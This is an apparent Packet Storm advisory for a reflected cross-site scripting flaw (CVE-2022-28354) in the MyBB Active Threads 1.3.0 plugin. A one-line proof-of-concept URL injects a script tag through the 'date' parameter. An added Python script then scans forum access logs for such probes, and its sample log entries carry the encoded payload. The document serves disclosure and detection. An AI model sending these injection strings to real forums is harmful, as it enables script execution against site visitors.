packetstorm | 0xB9 | PACKETSTORM:171402
Mar 20, 2023 - 12:00 a.m.

MyBB Active Threads 1.3.0 Cross Site Scripting

Source: packetstormsecurity.com
Tags: mybb active threads, cross-site scripting, cve-2022-28354, plugin 1.3.0, xss, windows 10

EPSS: 0.001 (percentile: 49.9%)

```
# Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting
# Date: February 9, 2022
# Author: 0xB9
# Twitter: @0xB9sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336
# Version: 1.3.0
# Tested On: Windows 10
# CVE: CVE-2022-28354

Description:
This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.

Proof of Concept:
activethreads.php?days=7&hours=0&mins=0&date="><script>alert(1)</script>
```
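For defenders checking whether this issue has been probed on their forum, the following added example (not part of the original advisory or the plugin's code) scans access log lines for requests to activethreads.php whose `date`, `days`, `hours` or `mins` parameter decodes to HTML metacharacters. The combined log format, the `/forum/` path and the sample entries are assumptions constructed for illustration; the check also unwinds repeated percent-encoding, which goes beyond the single URL shown in the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that can close an HTML attribute or open a tag.
HTML_META = set("<>\"'`")
# Query parameters shown in the advisory's proof-of-concept URL.
WATCHED_PARAMS = ("date", "days", "hours", "mins")


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return {param: decoded value} for watched activethreads.php
    parameters that carry HTML metacharacters, or {} if there are none."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    url = urlsplit(match.group("target"))
    if not url.path.lower().endswith("/activethreads.php"):
        return {}
    hits = {}
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in map(fully_decode, values):
            if name in WATCHED_PARAMS and HTML_META & set(value):
                hits[name] = value
    return hits


# Constructed sample entries (documentation IP range, made-up /forum/ path).
PREFIX = '203.0.113.9 - - [20/Mar/2023:10:00:07 +0000] "GET /forum/'
SUFFIX = ' HTTP/1.1" 200 5301'
SAMPLE_LOG = [
    PREFIX + "activethreads.php?days=7&hours=0&mins=0" + SUFFIX,
    PREFIX + "activethreads.php?days=7&hours=0&mins=0"
    "&date=%22%3E%3Cscript%3Ealert(1)%3C/script%3E" + SUFFIX,
    PREFIX + "activethreads.php?days=7"
    "&date=%2522%253E%253Cscript%253Ealert(1)%253C/script%253E" + SUFFIX,
    PREFIX + "index.php?date=%3Cb%3E" + SUFFIX,
]
```

Call `suspicious_params()` on each log line; a non-empty result names the parameter and the decoded value to review.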
